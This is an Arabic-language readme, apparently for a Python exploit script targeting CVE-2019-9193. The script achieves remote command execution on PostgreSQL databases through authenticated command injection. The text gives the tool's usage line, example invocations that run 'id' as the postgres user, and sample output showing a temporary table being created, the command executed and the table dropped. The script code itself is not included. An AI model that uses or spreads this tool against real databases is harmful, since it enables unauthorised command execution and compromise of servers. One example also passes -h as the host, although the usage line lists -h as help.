
نص برمجي لاستغلال الثغرة CVE-2019-9193 بلغة Python، يتيح تنفيذ التعليمات البرمجية عن بُعد على قواعد بيانات PostgreSQL الضعيفة عبر حقن أوامر مصادق عليه.
الاستخدام: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]
مثال: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'
مثال 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'
المخرجات:
[+] الاتصال بقاعدة بيانات PostgreSQL على 127.0.0.1:5432 [+] تم تأسيس الاتصال بقاعدة البيانات [+] جارٍ التحقق من إصدار PostgreSQL [+] من المحتمل أن PostgreSQL 9.3 عرضة للثغرات [+] إنشاء الجدول _30e173ba7fa5577a86b9e9ecfea13360 [+] تم تنفيذ الأمر
uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)
[+] حذف الجدول _30e173ba7fa5577a86b9e9ecfea13360